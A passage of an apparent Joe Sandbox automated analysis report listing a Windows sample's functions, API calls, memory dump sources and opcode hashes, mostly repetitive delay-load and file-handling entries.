                                                                                                                                                      • Opcode Fuzzy Hash: 5b69933f11ce3ce3d3ad38b72ecff7b663d909833c2123c5e08e477074d3170b
                                                                                                                                                      • Instruction Fuzzy Hash: B6A001AA2AD222BC71086266AE17E7B122DE5C9F65331AA1AF402C508AA880588A1031
                                                                                                                                                      Function 00A44B53 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A44B3B
                                                                                                                                                        • Part of subcall function 00A44FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A45041
                                                                                                                                                        • Part of subcall function 00A44FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A45052
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1269201914-0
                                                                                                                                                      • Opcode ID: c32e144ca2b46fcc8f979f30444c8600834b4447fc79f9ed80cad29a77ba9c53
                                                                                                                                                      • Instruction ID: 0cdb040419a520facea5180214b2b5665457259583b18ef9660d9ae8a76b42b9
                                                                                                                                                      • Opcode Fuzzy Hash: c32e144ca2b46fcc8f979f30444c8600834b4447fc79f9ed80cad29a77ba9c53
                                                                                                                                                      • Instruction Fuzzy Hash: B6A001AA2AD222BC71086266AE17E7B122DE5C9F65331AA1AF402C508AA880588A1031
                                                                                                                                                      Function 00A44CA8 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A44C90
                                                                                                                                                        • Part of subcall function 00A44FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A45041
                                                                                                                                                        • Part of subcall function 00A44FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A45052
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1269201914-0
                                                                                                                                                      • Opcode ID: 1169ba1dfe4a31a17bc9211692136757af537ad6fb6f59a8c2f347799f3d81b3
                                                                                                                                                      • Instruction ID: b03f99c04ccd1f42fb25bacb0adb0f898756c58501002ae39ff3835422c21a81
                                                                                                                                                      • Opcode Fuzzy Hash: 1169ba1dfe4a31a17bc9211692136757af537ad6fb6f59a8c2f347799f3d81b3
                                                                                                                                                      • Instruction Fuzzy Hash: 71A002EE2BE516FC314862616F57E7F023DE5CDFA63368F1EF402C5482A8801C891031
                                                                                                                                                      Function 00A44CE4 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A44CF1
                                                                                                                                                        • Part of subcall function 00A44FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A45041
                                                                                                                                                        • Part of subcall function 00A44FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A45052
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1269201914-0
                                                                                                                                                      • Opcode ID: 8077fe8f3d823c08cbda8a57054b9635bbac17ce2877715727d7e9b16bc60a65
                                                                                                                                                      • Instruction ID: 86176bdf8e26660c5a53e93f72a003ddd3d2aed40e3e314265c1f0c4ea19dbe0
                                                                                                                                                      • Opcode Fuzzy Hash: 8077fe8f3d823c08cbda8a57054b9635bbac17ce2877715727d7e9b16bc60a65
                                                                                                                                                      • Instruction Fuzzy Hash: 19A001AE2AE512BD318862616F56E7A022DE5D9F253358A1AF401D5082A98118891071
                                                                                                                                                      Function 00A44CFF Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A44CF1
                                                                                                                                                        • Part of subcall function 00A44FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A45041
                                                                                                                                                        • Part of subcall function 00A44FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A45052
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1269201914-0
                                                                                                                                                      • Opcode ID: 4579dde20e54faae743afb2117905a92e4724d56d39b24b6c2c44f8bbed8bc11
                                                                                                                                                      • Instruction ID: 8b18ec4610fae345d2bb180b379847e80188a24e5d889ad39b9e01fee590d7ba
                                                                                                                                                      • Opcode Fuzzy Hash: 4579dde20e54faae743afb2117905a92e4724d56d39b24b6c2c44f8bbed8bc11
                                                                                                                                                      • Instruction Fuzzy Hash: BEA001AE2AE512BC318862616E56E7A022DE5D9F653358A1AF402C5082A98118891031
                                                                                                                                                      Function 00A44CC6 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A44C90
                                                                                                                                                        • Part of subcall function 00A44FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A45041
                                                                                                                                                        • Part of subcall function 00A44FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A45052
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1269201914-0
                                                                                                                                                      • Opcode ID: 122a8c005cd15e48e352fc7389f3be697243bfcec5fde9e35177ecd586894ad1
                                                                                                                                                      • Instruction ID: b03f99c04ccd1f42fb25bacb0adb0f898756c58501002ae39ff3835422c21a81
                                                                                                                                                      • Opcode Fuzzy Hash: 122a8c005cd15e48e352fc7389f3be697243bfcec5fde9e35177ecd586894ad1
                                                                                                                                                      • Instruction Fuzzy Hash: 71A002EE2BE516FC314862616F57E7F023DE5CDFA63368F1EF402C5482A8801C891031
                                                                                                                                                      Function 00A44CD0 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A44C90
                                                                                                                                                        • Part of subcall function 00A44FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A45041
                                                                                                                                                        • Part of subcall function 00A44FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A45052
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1269201914-0
                                                                                                                                                      • Opcode ID: 06b42ca37dd3e640cb5eb21bf965459fd7d41d08e59c62a83cbf255603e7417c
                                                                                                                                                      • Instruction ID: b03f99c04ccd1f42fb25bacb0adb0f898756c58501002ae39ff3835422c21a81
                                                                                                                                                      • Opcode Fuzzy Hash: 06b42ca37dd3e640cb5eb21bf965459fd7d41d08e59c62a83cbf255603e7417c
                                                                                                                                                      • Instruction Fuzzy Hash: 71A002EE2BE516FC314862616F57E7F023DE5CDFA63368F1EF402C5482A8801C891031
                                                                                                                                                      Function 00A44CDA Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A44C90
                                                                                                                                                        • Part of subcall function 00A44FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A45041
                                                                                                                                                        • Part of subcall function 00A44FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A45052
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1269201914-0
                                                                                                                                                      • Opcode ID: 2fab141b326dbacceea8a4689656db88c6999d21b29b7f9d5b1841feeeae1e7e
                                                                                                                                                      • Instruction ID: b03f99c04ccd1f42fb25bacb0adb0f898756c58501002ae39ff3835422c21a81
                                                                                                                                                      • Opcode Fuzzy Hash: 2fab141b326dbacceea8a4689656db88c6999d21b29b7f9d5b1841feeeae1e7e
                                                                                                                                                      • Instruction Fuzzy Hash: 71A002EE2BE516FC314862616F57E7F023DE5CDFA63368F1EF402C5482A8801C891031
                                                                                                                                                      Function 00A21DE7 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • SetDlgItemTextW.USER32(?,?,?), ref: 00A21DFC
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ItemText
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3367045223-0
                                                                                                                                                      • Opcode ID: b5aa30477f0c461b35f9d9f8cbc23880ccfc4c047bbf5d75b1d4c96850ec3935
                                                                                                                                                      • Instruction ID: a85ea06b7712a032f58b0e93e87c1da8e29f4ed84421153c7044d39f1f2610fe
                                                                                                                                                      • Opcode Fuzzy Hash: b5aa30477f0c461b35f9d9f8cbc23880ccfc4c047bbf5d75b1d4c96850ec3935
                                                                                                                                                      • Instruction Fuzzy Hash: 5EC00231508200FFCB05CF58ED48E1BBBB6FB95311B51C568F05886030C331D961DBA2
                                                                                                                                                      Function 00A44D13 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A44CF1
                                                                                                                                                        • Part of subcall function 00A44FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A45041
                                                                                                                                                        • Part of subcall function 00A44FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A45052
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1269201914-0
                                                                                                                                                      • Opcode ID: f907654f111fe53507ced0394b3d6542e8009d950c2b1c96e1167c051188d9b4
                                                                                                                                                      • Instruction ID: 8b18ec4610fae345d2bb180b379847e80188a24e5d889ad39b9e01fee590d7ba
                                                                                                                                                      • Opcode Fuzzy Hash: f907654f111fe53507ced0394b3d6542e8009d950c2b1c96e1167c051188d9b4
                                                                                                                                                      • Instruction Fuzzy Hash: BEA001AE2AE512BC318862616E56E7A022DE5D9F653358A1AF402C5082A98118891031
                                                                                                                                                      Function 00A2E8D9 Relevance: 1.5, APIs: 1, Instructions: 5fileCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • SetEndOfFile.KERNELBASE(?,00A2D115,?,?,?,?,?,?,?), ref: 00A2E8DC
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: File
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 749574446-0
                                                                                                                                                      • Opcode ID: e7b153db37b66336563d019d153adbf2bb6c873a97397844f644cee6d3e6454c
                                                                                                                                                      • Instruction ID: 6a0e4c950f8cb8b6e39b4a532399eaed5086ba62a339841be1c25cd61fa8af1e
                                                                                                                                                      • Opcode Fuzzy Hash: e7b153db37b66336563d019d153adbf2bb6c873a97397844f644cee6d3e6454c
                                                                                                                                                      • Instruction Fuzzy Hash: 4AA00130201205CBDA415B61DE0960E7A6ABE516AA71980A8A409890B5DB2688A3EA41
                                                                                                                                                      Function 00A2DE50 Relevance: 1.3, APIs: 1, Instructions: 28COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • CloseHandle.KERNELBASE(?,?,00000001,00A2DE10,5C02E116,?,00000000,00A593B1,000000FF,?,00A2BEA6,?), ref: 00A2DE6B
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CloseHandle
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2962429428-0
                                                                                                                                                      • Opcode ID: 10bae971b7aa8fcf81d98cbb46358f0f634578e2b0dafaae00dd78e11fd344dd
                                                                                                                                                      • Instruction ID: 856ab4677fb1cee3b11086d930fa673d8011bb1765389ab2cbd9443c35d96033
                                                                                                                                                      • Opcode Fuzzy Hash: 10bae971b7aa8fcf81d98cbb46358f0f634578e2b0dafaae00dd78e11fd344dd
                                                                                                                                                      • Instruction Fuzzy Hash: 96F0A0B0442B61DFE7349B3CE804393B7E46B21335F058B2ED0F64A5E5C3B0A9899B50

                                                                                                                                                      Non-executed Functions

                                                                                                                                                      Function 00A29B5C Relevance: 23.3, APIs: 9, Strings: 4, Instructions: 577fileCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • _wcslen.LIBCMT ref: 00A29CB1
                                                                                                                                                        • Part of subcall function 00A2AC11: GetCurrentProcess.KERNEL32(00000020,?), ref: 00A2AC2E
                                                                                                                                                        • Part of subcall function 00A2AC11: GetLastError.KERNEL32 ref: 00A2AC72
                                                                                                                                                        • Part of subcall function 00A2AC11: CloseHandle.KERNEL32(?), ref: 00A2AC81
                                                                                                                                                        • Part of subcall function 00A22F45: _wcslen.LIBCMT ref: 00A22F50
                                                                                                                                                      • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000001,00000080,00000000,?,00000000,?,00000001,?,00000000,00000000,?,\??\), ref: 00A29EE1
                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,5C02EC5E,00A59937,000000FF), ref: 00A29F1E
                                                                                                                                                      • CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000003,02200000,00000000,?,00000000,?,00000000,?,00000001,?,00000000,00000000), ref: 00A2A0BF
                                                                                                                                                        • Part of subcall function 00A214A7: _wcslen.LIBCMT ref: 00A214B8
                                                                                                                                                      • DeviceIoControl.KERNEL32(00000000,000900A4,?,-00000008,00000000,00000000,?,00000000), ref: 00A2A127
                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,5C02EC5E,00A59937,000000FF), ref: 00A2A134
                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,5C02EC5E,00A59937,000000FF), ref: 00A2A14A
                                                                                                                                                      • RemoveDirectoryW.KERNEL32(00000000,00000009,?,?,?,?,?,?,?,?,?,5C02EC5E,00A59937,000000FF), ref: 00A2A18E
                                                                                                                                                      • DeleteFileW.KERNEL32(00000000,00000009,?,?,?,?,?,?,?,?,?,5C02EC5E,00A59937,000000FF), ref: 00A2A196
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CloseFileHandle_wcslen$CreateErrorLast$ControlCurrentDeleteDeviceDirectoryProcessRemove
                                                                                                                                                      • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                                                                                      • API String ID: 3517300771-3508440684
                                                                                                                                                      • Opcode ID: c4dfa051757887d015aec627f24cd4883a7f4c31c15691f54a571e85f09cb0d2
                                                                                                                                                      • Instruction ID: 2c419e3176976649d0eede88dccfaca74137f128a92ed9300d4798fc25863430
                                                                                                                                                      • Opcode Fuzzy Hash: c4dfa051757887d015aec627f24cd4883a7f4c31c15691f54a571e85f09cb0d2
                                                                                                                                                      • Instruction Fuzzy Hash: 41327E71900298EFDF24DFA8ED91BEE77B9BF15710F104129E849E7281DB349A48CB61
                                                                                                                                                      Function 00A41630 Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 275windowfileCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • __EH_prolog3_GS.LIBCMT ref: 00A4163A
                                                                                                                                                        • Part of subcall function 00A21E44: GetDlgItem.USER32(00000000,00003021), ref: 00A21E88
                                                                                                                                                        • Part of subcall function 00A21E44: SetWindowTextW.USER32(00000000,00A5C6C8), ref: 00A21E9E
                                                                                                                                                      • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 00A416BB
                                                                                                                                                      • EndDialog.USER32(?,00000006), ref: 00A416CE
                                                                                                                                                      • GetDlgItem.USER32(?,0000006C), ref: 00A416EA
                                                                                                                                                      • SetFocus.USER32(00000000), ref: 00A416F1
                                                                                                                                                        • Part of subcall function 00A214A7: _wcslen.LIBCMT ref: 00A214B8
                                                                                                                                                        • Part of subcall function 00A21DE7: SetDlgItemTextW.USER32(?,?,?), ref: 00A21DFC
                                                                                                                                                      • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 00A41763
                                                                                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00A41783
                                                                                                                                                      • FindClose.KERNEL32(00000000,?,00000000,00000000,00000000,00000099,?,?,00000000), ref: 00A41826
                                                                                                                                                      • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 00A418AD
                                                                                                                                                        • Part of subcall function 00A21150: _wcslen.LIBCMT ref: 00A2115B
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
